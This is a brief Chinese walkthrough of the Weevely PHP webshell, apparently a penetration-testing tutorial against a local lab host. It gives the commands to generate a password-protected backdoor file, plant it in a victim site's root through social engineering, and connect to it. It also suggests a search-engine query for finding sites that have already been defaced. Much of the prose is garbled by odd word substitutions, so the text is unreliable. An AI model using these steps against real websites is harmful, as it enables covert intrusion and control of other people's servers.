天生和管理很难检测到的PHP木马,Weevely是一个隐形的PHP网页的外壳,仿照的远程连接。这是一个Web运用程序后开拓的主要工具,可用于像一个隐蔽的后门,作为一个有用的远程掌握台改换管理网络帐户,纵然托管在免费托管做事。只是天生并上传“做事器”目标Web做事器上的PHP代码,Weevely客户端在本地运行shell命令传输。
那么如何利用weevely掌握目标主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.受害者主机一个;
3.整装待发的小白一个。
三、渗透测试
3.1 利用搜索引擎检索已经被黑客挂黑页的网站,如下图所示。
谷歌语法:intltle:hacked by
3.2 在攻击者主机打开Kali 中的中国菜刀软件(weevely),如下图所示。
命令:weevely
3.3 在受害者主机安装网站环境,这里以phpstudy集成环境举例,如下图所示。
步骤:百度检索phpstudy
下载网址:https://www.xp.cn/download.html
安装教程:https://www.php.cn/php-weizijiaocheng-396668.html
3.4 利用weevely工具在攻击者主机天生shell.php后门文件,如下图所示。
命令:weevely generate admin /tmp/shell.php
3.5 查看天生的shell.php文件内容,如下图所示。
命令:cat /tmp/shell.php
3.6 将天生的后门文件利用社会工程学导入受害者网站根目录,如下图所示。
3.7 查看受害者主机的IP地址,如下图所示。
命令:ipconfig
3.8 连接后门,如下图所示。
命令:weevely http://192.168.0.103/shell.php admin
3.9 查看拿下的网站目录,如下图所示。
命令:dir
